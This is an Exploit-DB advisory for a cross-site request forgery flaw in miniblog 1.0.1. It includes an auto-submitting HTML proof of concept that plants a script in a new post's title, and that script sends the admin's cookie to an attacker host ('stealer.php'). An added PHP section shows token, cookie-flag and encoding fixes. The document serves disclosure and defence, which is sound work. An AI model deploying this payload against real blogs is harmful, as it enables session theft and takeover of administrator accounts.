miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)

2016-10-09T00:00:00
ID EDB-ID:40480
Type exploitdb
Reporter Besim
Modified 2016-10-09T00:00:00

Description

miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post). Webapps exploit for PHP platform

                                        
# Exploit Title :              miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
# Author :                     Besim
# Google Dork :                
# Date :                       09/10/2016
# Type :                       webapps
# Platform :                   PHP
# Vendor Homepage :  http://www.spyka.net/scripts/php/miniblog
# Software link :    http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip


Description (admin login required) : 

miniblog version 1.0.1 is vulnerable to a CSRF attack that allows adding,
deleting and editing articles in the sections.

Vulnerable page : http://localhost:8081/miniblog/adm/admin.php?mode=add

Dangerous point : if combined with XSS, it can be used to steal the admin's cookie information.


############### CSRF PoC ###############


<html>
<!-- CSRF PoC -->
<body>
<form action="http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E" method="POST">
<input type="hidden" name="data[post_title]" value="<script>location.href = ‘http://www.attackersite.com/stealer.php?cookie=’+document.cookie&#59;</script>" />
<input type="hidden" name="data[post_content]" value="tester" />
<input type="hidden" name="data[published]" value="1" />
<input type="hidden" name="miniblog_PostBack" value="Add" />
<input type="submit" value="Submit request" />
</form>
<script> document.forms[0].submit(); </script>
</body>
</html>



########################################
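
Mitigation example, added here and not part of the original advisory or of miniblog's own code: a per-session token check on the add-post postback, session-cookie flags, and output encoding for the post title. The helper names and the csrf_token field are assumptions; the data[post_title] and miniblog_PostBack field names are the ones the PoC form submits.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical helpers for a page such as adm/admin.php?mode=add.
// Function names and the "csrf_token" field are assumptions, not miniblog code.

function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // one token per session
    }
    return $_SESSION['csrf_token'];
}

function csrf_valid($submitted): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    // Reject missing or non-string input, then compare in constant time.
    return $expected !== '' && is_string($submitted)
        && hash_equals($expected, $submitted);
}

function e(string $value): string {
    // Encode for HTML text/attribute context so stored markup is shown, not run.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// HttpOnly keeps the session cookie out of document.cookie;
// SameSite=Lax stops the browser attaching it to a cross-site POST.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();
$title = '';

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_POST['miniblog_PostBack'])) {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    $raw = $_POST['data']['post_title'] ?? '';
    $title = is_string($raw) ? $raw : '';
    // Persist with the application's existing storage code; call e() on every render.
}
?>
<form method="post" action="admin.php?mode=add">
  <input type="hidden" name="csrf_token" value="<?= e(csrf_token()) ?>">
  <input type="text" name="data[post_title]" value="<?= e($title) ?>">
  <input type="submit" name="miniblog_PostBack" value="Add">
</form>
```

The same token check belongs on the edit and delete actions the description mentions, since they change state as well.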